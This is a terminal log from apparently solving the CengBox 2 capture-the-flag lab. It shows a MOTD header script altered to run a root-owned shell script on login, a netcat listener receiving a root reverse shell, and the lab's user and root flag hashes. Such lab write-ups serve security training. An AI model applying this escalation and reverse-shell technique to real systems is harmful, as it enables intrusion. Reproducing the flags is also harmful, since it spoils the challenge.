Users:
kevin
aaron







mitnick@cengbox:~$ cat /etc/update-motd.d/00-header 
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
	# Fall back to using the very slow lsb_release utility
	DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

/home/mitnick/root.sh
mitnick@cengbox:~$ 
mitnick@cengbox:~$ 
mitnick@cengbox:~$ 
mitnick@cengbox:~$ 
mitnick@cengbox:~$ 
mitnick@cengbox:~$ cat user.txt 
a10333b0b7c3f914e8c446fd8e9cd362










root@ap:~/CTF/CengBox:2# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.0.5] from (UNKNOWN) [192.168.0.6] 48668
bash: cannot set terminal process group (3507): Inappropriate ioctl for device
bash: no job control in this shell
root@cengbox:/# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cengbox:/# 

root@cengbox:/# 

root@cengbox:/# 

root@cengbox:/# cd /root
cd /root
root@cengbox:/root# ls
ls
root.txt
root@cengbox:/root# cat root.txt
cat root.txt
  _____ ______             ____            ___  
 / ____|  ____|           |  _ \          |__ \ 
| |    | |__   _ __   __ _| |_) | _____  __  ) |
| |    |  __| | '_ \ / _` |  _ < / _ \ \/ / / / 
| |____| |____| | | | (_| | |_) | (_) >  < / /_ 
 \_____|______|_| |_|\__, |____/ \___/_/\_\____|
                      __/ |                     
                     |___/                      

I would be grateful for your any feedback. Feel free to contact me on Twitter @arslanblcn_

de89782fe4e8bf2198a022ae7f50613e
root@cengbox:/root# 

